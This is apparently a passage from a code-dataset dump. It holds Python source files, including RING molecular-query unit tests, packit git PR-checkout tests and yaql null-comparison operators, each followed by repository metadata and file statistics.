        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1, 0), (0, 1), (1, 2), (2, 1))))
    def test_double_triple_bond(self):
        """Mixed double/single/triple chain matches 'C=C-C#C' exactly once."""
        testmol = Chem.MolFromSmiles('C=C-C#C')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 double bond to c1
        C labeled c3 single bond to c2
        C labeled c4 triple bond to c3
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1, 2, 3),)))
    def test_aromatic_bond(self):
        """Aromatic-bond query on benzene matches all 6 ring bonds, both ways."""
        testmol = Chem.MolFromSmiles('c1ccccc1')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 aromatic bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (0, 5), (1, 0), (1, 2), (2, 1),
                                     (2, 3), (3, 2), (3, 4), (4, 3), (4, 5),
                                     (5, 4), (5, 0))))
    def test_ring_bond1(self):
        """Closed 4-ring query (with explicit ringbond closure) on 'CCC1CCC1'."""
        testmol = Chem.MolFromSmiles('CCC1CCC1')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 ring bond to c1
        C labeled c3 ring bond to c2
        C labeled c4 ring bond to c3
        ringbond c4 ring bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((2, 3, 4, 5), (2, 5, 4, 3),
                                     (3, 2, 5, 4), (3, 4, 5, 2),
                                     (4, 3, 2, 5), (4, 5, 2, 3),
                                     (5, 2, 3, 4), (5, 4, 3, 2))))
    def test_ring_bond2(self):
        """'ring bond' pairs match only the ring atoms (2-5), not the chain."""
        testmol = Chem.MolFromSmiles('CCC1CCC1')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 ring bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((2, 3), (2, 5), (3, 2), (3, 4), (4, 3),
                                     (4, 5), (5, 4), (5, 2))))
    def test_non_ring_bond(self):
        """'nonring bond' matches only the acyclic chain bonds of 'CCC1CCC1'."""
        testmol = Chem.MolFromSmiles('CCC1CCC1')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 nonring bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
    def test_any_bond1(self):
        """'any bond' matches single, double and triple bonds alike."""
        testmol = Chem.MolFromSmiles('CC=CC#C')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 any bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1),
                                     (2, 3), (3, 2), (3, 4), (4, 3))))
    def test_any_bond2(self):
        """Duplicate of test_any_bond1."""
        # NOTE(review): this test is byte-identical to test_any_bond1 —
        # possibly a copy-paste that was meant to use a different query or
        # molecule; confirm intent with the authors.
        testmol = Chem.MolFromSmiles('CC=CC#C')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 any bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1),
                                     (2, 3), (3, 2), (3, 4), (4, 3))))
    def test_strong_bond(self):
        """'strong bond' matches only the double and triple bonds."""
        testmol = Chem.MolFromSmiles('CC=CC#C')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 strong bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1, 2), (2, 1), (3, 4), (4, 3))))
    def test_other_bond1(self):
        """A 'positive fragment' query does not match an anionic molecule."""
        testmol = Chem.MolFromSmiles('C[CH2-]')
        s = """
        positive fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertEqual(match_index, ())
    def test_other_bond2(self):
        """A 'negative fragment' query does not match a cationic molecule."""
        testmol = Chem.MolFromSmiles('C[CH2+]')
        s = """
        negative fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertEqual(match_index, ())
    def test_other_bond3(self):
        """'olefinic fragment' on 'C=CC' matches the C-C single bond only."""
        testmol = Chem.MolFromSmiles('C=CC')
        s = """
        olefinic fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1, 2), (2, 1))))
    def test_other_bond4(self):
        """'paraffinic fragment' does not match a molecule with a double bond."""
        testmol = Chem.MolFromSmiles('C=CC')
        s = """
        paraffinic fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertEqual(match_index, ())
    def test_other_bond5(self):
        """'paraffinic fragment' matches the saturated molecule 'CCC'."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        paraffinic fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
    def test_other_bond6(self):
        """'linear fragment' matches the acyclic molecule 'CCC'."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        linear fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
    def test_other_bond7(self):
        """'cyclic fragment' does not match the acyclic molecule 'CCC'."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        cyclic fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertEqual(match_index, ())
    def test_other_bond8(self):
        """'cyclic fragment' matches all single bonds of ring-bearing 'C1CCC1C'."""
        testmol = Chem.MolFromSmiles('C1CCC1C')
        s = """
        cyclic fragment a{
        C labeled c1
        C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (0, 3), (1, 0), (1, 2),
                                     (2, 1), (2, 3), (3, 2),
                                     (3, 4), (3, 0), (4, 3))))
    def test_symbol_atomsuffix(self):
        """'$' wildcard matches every atom, including the implicit hydrogens
        (indices 3-10 on propane)."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        fragment a{
        $ labeled c1
        $ labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (0, 3), (0, 4), (0, 5), (1, 0),
                                     (1, 2), (1, 6), (1, 7), (2, 1), (2, 8),
                                     (2, 9), (2, 10), (3, 0), (4, 0),
                                     (5, 0), (6, 1), (7, 1), (8, 2), (9, 2),
                                     (10, 2))))
    def test_other_bond9(self):
        """'X' symbol matches both C and O in 'CCO'."""
        # NOTE(review): from the expected tuples, 'X' appears to be a
        # heavy-atom wildcard — confirm against the RING grammar.
        testmol = Chem.MolFromSmiles('CCO')
        s = """
        fragment a{
        X labeled c1
        X labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (1, 0), (1, 2), (2, 1))))
    def test_other_bond10(self):
        """'&' matches only the sulfur atom of 'CCS' as c2."""
        # NOTE(review): '&' presumably matches heteroatoms — confirm against
        # the RING grammar.
        testmol = Chem.MolFromSmiles('CCS')
        s = """
        fragment a{
        X labeled c1
        & labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1, 2),)))
    def test_atom_constraint1(self):
        """Constraint '=2 C': c2 must be the middle carbon with 2 C neighbors."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 single bond to c1 {connected to =2 C}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1), (2, 1))))
    def test_atom_constraint2(self):
        """Constraint '=1 C': c2 must be a terminal carbon."""
        testmol = Chem.MolFromSmiles('CCC')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 single bond to c1 {connected to =1 C}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1, 0), (1, 2))))
    def test_atom_constraint3(self):
        """Constraint with bond type: c2 must have one doubly-bonded C neighbor."""
        testmol = Chem.MolFromSmiles('CC=C')
        s = """
        fragment a{
        C labeled c1
        C labeled c2 single bond to c1 {connected to =1 C with double bond}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1),)))
    def test_atom_constraint4(self):
        """Count constraint '>1': only the middle carbon has >1 C neighbor."""
        testmol = Chem.MolFromSmiles('CC=C')
        s = """
        fragment a{
        C labeled c1 {connected to >1 C with any bond}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((1,),)))
    def test_atom_constraint5(self):
        """Negated constraint '!connected': matches the two terminal carbons."""
        testmol = Chem.MolFromSmiles('CC=C')
        s = """
        fragment a{
        C labeled c1 {!connected to >1 C with any bond}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, ), (2, ))))
    def test_atom_constraint6(self):
        """Ring-membership constraints: chain carbon bonded to a ring carbon."""
        testmol = Chem.MolFromSmiles('CC1CCC1')
        s = """
        fragment a{
        C labeled c1 {!in ring of size >0}
        C labeled c2 single bond to c1 {in ring of size >0}
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1),)))
    def test_atom_prefix1(self):
        """'nonringatom'/'ringatom' prefixes select the chain-ring junction."""
        testmol = Chem.MolFromSmiles('CC1CCC1')
        s = """
        fragment a{
        nonringatom C labeled c1
        ringatom C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1),)))
    def test_atom_prefix2(self):
        """'nonaromatic'/'aromatic' prefixes select toluene's methyl-ring bond."""
        testmol = Chem.MolFromSmiles('Cc1ccccc1')
        s = """
        fragment a{
        nonaromatic C labeled c1
        aromatic C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1),)))
    def test_atom_prefix3(self):
        """'allylic' prefix: c2 is the carbon adjacent to the double bond."""
        testmol = Chem.MolFromSmiles('CC=C')
        s = """
        fragment a{
        C labeled c1
        allylic C labeled c2 single bond to c1
        }
        """
        molquery = Read(s)
        match_index = molquery.GetQueryMatches(testmol)
        self.assertListEqual(sorted(match_index),
                             sorted(((0, 1),)))
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
    unittest.main()
| 32.094527
| 79
| 0.481631
| 1,390
| 12,902
| 4.380576
| 0.079137
| 0.095254
| 0.07144
| 0.133355
| 0.866481
| 0.842503
| 0.800131
| 0.773033
| 0.751519
| 0.746592
| 0
| 0.050129
| 0.400093
| 12,902
| 401
| 80
| 32.174564
| 0.736563
| 0.001628
| 0
| 0.653951
| 0
| 0
| 0.286513
| 0
| 0
| 0
| 0
| 0
| 0.079019
| 1
| 0.079019
| false
| 0
| 0.008174
| 0
| 0.089918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a5f5c1f7ef5252d4d1bc59e5dc9d0a1cff4291b
| 152
|
py
|
Python
|
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | 1
|
2021-01-12T17:06:54.000Z
|
2021-01-12T17:06:54.000Z
|
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | null | null | null |
twitter_sentence_generator/transformers/list_transformer.py
|
DEV3L/python-heroku-twitter-random-sentence-generator
|
ca19ea5c5450a2998964beda2792000aa0c2521a
|
[
"Beerware"
] | null | null | null |
class ListTransformer:
    """Wrap a sequence and expose simple read-only conversions of it.

    Fixes: drops the non-idiomatic empty parentheses in the class statement
    and documents the public surface.
    """

    def __init__(self, _list):
        """Store the sequence to transform.

        :param _list: iterable whose items will be exposed as a tuple
        """
        self._list = _list

    @property
    def tuple(self):
        """Return the wrapped items as a tuple (a fresh tuple each access)."""
        return tuple(self._list)
| 19
| 32
| 0.618421
| 17
| 152
| 5.058824
| 0.529412
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.276316
| 152
| 7
| 33
| 21.714286
| 0.781818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
8a69d1114364f2cb12f99b99c1f1ad009a640866
| 2,849
|
py
|
Python
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | 1
|
2020-12-28T18:00:22.000Z
|
2020-12-28T18:00:22.000Z
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | 7
|
2020-12-28T19:57:35.000Z
|
2021-04-17T14:43:15.000Z
|
tests/integration/test_local_project.py
|
cheese/packit
|
790b01a30575b6bfd680fdc991542ba60e40a9f2
|
[
"MIT"
] | null | null | null |
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import subprocess
from pathlib import Path
from ogr import GithubService, GitlabService
from packit.local_project import LocalProject
from tests.spellbook import initiate_git_repo
def test_pr_id_and_ref(tmp_path: Path):
    """ p-s passes both ref and pr_id, we want to check out PR """
    bare_remote = tmp_path / "remote"
    bare_remote.mkdir()
    subprocess.check_call(["git", "init", "--bare", "."], cwd=bare_remote)

    repo = tmp_path / "upstream_git"
    repo.mkdir()
    initiate_git_repo(repo, push=True, upstream_remote=str(bare_remote))

    # mimic github PR: publish HEAD^ under refs/pull/<id>/head
    pr_id = "123"
    ref = (
        subprocess.check_output(["git", "rev-parse", "HEAD^"], cwd=repo)
        .strip()
        .decode()
    )
    tmp_branch = "asdqwe"
    subprocess.check_call(["git", "branch", tmp_branch, ref], cwd=repo)
    subprocess.check_call(
        ["git", "push", "origin", f"{tmp_branch}:refs/pull/{pr_id}/head"],
        cwd=repo,
    )
    subprocess.check_call(["git", "branch", "-D", tmp_branch], cwd=repo)

    LocalProject(
        working_dir=repo,
        offline=True,
        pr_id=pr_id,
        ref=ref,
        git_service=GithubService(),
    )

    # the PR branch must be checked out now
    checked_out = (
        subprocess.check_output(
            ["git", "rev-parse", "--abbrev-ref", "HEAD"], cwd=repo
        )
        .strip()
        .decode()
    )
    assert checked_out == f"pr/{pr_id}"
def test_pr_id_and_ref_gitlab(tmp_path: Path):
    """ p-s passes both ref and pr_id, we want to check out PR """
    bare_remote = tmp_path / "remote"
    bare_remote.mkdir()
    subprocess.check_call(["git", "init", "--bare", "."], cwd=bare_remote)

    repo = tmp_path / "upstream_git"
    repo.mkdir()
    initiate_git_repo(repo, push=True, upstream_remote=str(bare_remote))

    # mimic gitlab MR: publish HEAD^ under refs/merge-requests/<id>/head
    pr_id = "123"
    ref = (
        subprocess.check_output(["git", "rev-parse", "HEAD^"], cwd=repo)
        .strip()
        .decode()
    )
    tmp_branch = "asdqwe"
    subprocess.check_call(["git", "branch", tmp_branch, ref], cwd=repo)
    subprocess.check_call(
        [
            "git",
            "push",
            "origin",
            f"{tmp_branch}:refs/merge-requests/{pr_id}/head",
        ],
        cwd=repo,
    )
    subprocess.check_call(["git", "branch", "-D", tmp_branch], cwd=repo)

    LocalProject(
        working_dir=repo,
        offline=True,
        pr_id=pr_id,
        ref=ref,
        git_service=GitlabService(token="12345"),
    )

    # the MR branch must be checked out now
    checked_out = (
        subprocess.check_output(
            ["git", "rev-parse", "--abbrev-ref", "HEAD"], cwd=repo
        )
        .strip()
        .decode()
    )
    assert checked_out == f"pr/{pr_id}"
| 29.677083
| 86
| 0.607582
| 352
| 2,849
| 4.667614
| 0.221591
| 0.133901
| 0.08521
| 0.107121
| 0.821668
| 0.821668
| 0.800974
| 0.800974
| 0.800974
| 0.800974
| 0
| 0.005143
| 0.24921
| 2,849
| 95
| 87
| 29.989474
| 0.762973
| 0.076869
| 0
| 0.675
| 0
| 0
| 0.135807
| 0.035195
| 0
| 0
| 0
| 0
| 0.025
| 1
| 0.025
| false
| 0
| 0.0625
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8a6a9973398dffc8ceede3ec2f004b9b182d900a
| 141
|
py
|
Python
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 69
|
2019-10-04T03:07:17.000Z
|
2020-03-13T14:53:15.000Z
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 1
|
2019-10-15T22:50:57.000Z
|
2019-10-15T23:00:28.000Z
|
my/materialistic.py
|
aluhrs13/HPI
|
e750666e30e8987f3a4c46755857dc85dd64446c
|
[
"MIT"
] | 1
|
2020-01-02T12:13:18.000Z
|
2020-01-02T12:13:18.000Z
|
# Deprecation shim for the relocated module.
from .core.warnings import high
# Emit a deprecation warning once, at import time.
high("DEPRECATED! Please use my.hackernews.materialistic instead.")
# Re-export the replacement module's public names so old imports keep working.
from .hackernews.materialistic import *
| 28.2
| 67
| 0.808511
| 17
| 141
| 6.705882
| 0.705882
| 0.403509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.099291
| 141
| 4
| 68
| 35.25
| 0.897638
| 0
| 0
| 0
| 0
| 0
| 0.41844
| 0.191489
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8a9711997accb9770342d7917e0cade0024c9d4a
| 145
|
py
|
Python
|
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
Euclid/test.py
|
Joe1sn/CryotoWork
|
34bb3d98b975e69f3e977c934e8c41f42ee129c8
|
[
"MIT"
] | null | null | null |
# Smoke-test script for Eucild (presumably Euclid's GCD algorithm -- confirm).
from Eucild import Eucild
# Typical case, and the same pair with arguments swapped.
print(Eucild(120,3))
print(Eucild(3,120))
# Degenerate and negative inputs.
print(Eucild(0,0))
print(Eucild(-2,-3))
# Non-numeric input -- presumably exercises error handling; verify expected output.
print(Eucild("hello","world"))
| 20.714286
| 30
| 0.682759
| 24
| 145
| 4.125
| 0.416667
| 0.555556
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 0.103448
| 145
| 7
| 30
| 20.714286
| 0.669231
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.833333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
8aac30258b07c44f0ea7a8123af61956fbdef6cc
| 91
|
py
|
Python
|
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
faker/providers/date_time/es_ES/__init__.py
|
dandycheung/faker
|
3220f8299c8e6364eeca2007b726c9d22d50918c
|
[
"MIT"
] | null | null | null |
from ..es import Provider as DateTimeProvider
class Provider(DateTimeProvider):
    """Date/time provider for the es_ES locale.

    Inherits all behavior unchanged from the generic Spanish provider
    (``..es``); this subclass exists only to register the locale.
    """
    pass
| 15.166667
| 45
| 0.78022
| 10
| 91
| 7.1
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164835
| 91
| 5
| 46
| 18.2
| 0.934211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
8ab65f2e207979d6b4bf30702e44cefe9fe48765
| 68
|
py
|
Python
|
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:43:44.000Z
|
2022-02-14T09:43:44.000Z
|
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | null | null | null |
client/pipes/__init__.py
|
chiaweil/pipelines
|
401706556799b258a51da4649c251d89462ec658
|
[
"Apache-2.0"
] | 1
|
2022-02-14T09:43:45.000Z
|
2022-02-14T09:43:45.000Z
|
from .client import *
from .inference import *
from .server import *
| 22.666667
| 24
| 0.75
| 9
| 68
| 5.666667
| 0.555556
| 0.392157
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.161765
| 68
| 3
| 25
| 22.666667
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
76f429fca7f4d3dbd8cef0539499f92c498e9feb
| 8,042
|
py
|
Python
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 112
|
2015-10-18T02:57:41.000Z
|
2022-03-28T18:26:36.000Z
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 3
|
2020-06-09T11:54:38.000Z
|
2021-04-30T06:12:37.000Z
|
yaql/standard_library/common.py
|
nzlosh/yaql
|
bb65fc64026d431ffb866d02825deb3a0e4b5943
|
[
"Apache-2.0"
] | 27
|
2015-12-10T00:10:02.000Z
|
2022-03-20T21:51:01.000Z
|
# Copyright (c) 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common module describes comparison operators for different types. Comparing
with null value is considered separately.
"""
from yaql.language import specs
@specs.name('*equal')
def eq(left, right):
    """:yaql:operator =
    Returns true if left and right are equal, false otherwise.
    It is system function and can be used to override behavior
    of comparison between objects.
    """
    # Delegates to Python's own equality protocol.
    return left == right
@specs.name('*not_equal')
def neq(left, right):
    """:yaql:operator !=
    Returns true if left and right are not equal, false otherwise.
    It is system function and can be used to override behavior
    of comparison between objects.
    """
    # Delegates to Python's own inequality protocol.
    return left != right
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<')
def left_lt_null(left, right):
    """:yaql:operator <
    Returns false. This function is called when left is not null and
    right is null.
    :signature: left < right
    :arg left: left operand
    :argType left: not null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> 1 < null
        false
    """
    # null sorts before every non-null value, so non-null < null is false.
    return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_<=')
def left_lte_null(left, right):
    """:yaql:operator <=
    Returns false. This function is called when left is not null
    and right is null.
    :signature: left <= right
    :arg left: left operand
    :argType left: not null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> 1 <= null
        false
    """
    # null sorts strictly before every non-null value, so <= is also false.
    return False
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>')
def left_gt_null(left, right):
    """:yaql:operator >
    Returns true. This function is called when left is not null
    and right is null.
    :signature: left > right
    :arg left: left operand
    :argType left: not null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> 1 > null
        true
    """
    # Every non-null value is considered greater than null.
    return True
@specs.parameter('right', type(None), nullable=True)
@specs.parameter('left', nullable=False)
@specs.name('#operator_>=')
def left_gte_null(left, right):
    """:yaql:operator >=
    Returns true. This function is called when left is not null
    and right is null.
    :signature: left >= right
    :arg left: left operand
    :argType left: not null
    :arg right: right operand
    :argType right: null
    :returnType: boolean
    .. code:
        yaql> 1 >= null
        true
    """
    # Every non-null value is considered greater than (hence >=) null.
    return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<')
def null_lt_right(left, right):
    """:yaql:operator <
    Returns true. This function is called when left is null and
    right is not.
    :signature: left < right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: not null
    :returnType: boolean
    .. code:
        yaql> null < 2
        true
    """
    # null sorts before every non-null value.
    return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_<=')
def null_lte_right(left, right):
    """:yaql:operator <=
    Returns true. This function is called when left is null and
    right is not.
    :signature: left <= right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: not null
    :returnType: boolean
    .. code:
        yaql> null <= 2
        true
    """
    # null sorts before every non-null value, so <= holds as well.
    return True
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>')
def null_gt_right(left, right):
    """:yaql:operator >
    Returns false. This function is called when left is null and right
    is not.
    :signature: left > right
    :arg left: left operand
    :argType left: null
    :arg right: right operand
    :argType right: not null
    :returnType: boolean
    .. code:
        yaql> null > 2
        false
    """
    # null is never greater than a non-null value.
    return False
@specs.parameter('left', type(None), nullable=True)
@specs.parameter('right', nullable=False)
@specs.name('#operator_>=')
def null_gte_right(left, right):
    """:yaql:operator >=
    Returns false. This function is called when left is null and
    right is not.
    :signature: left >= right
    :arg left: left operand
    :argType left: null
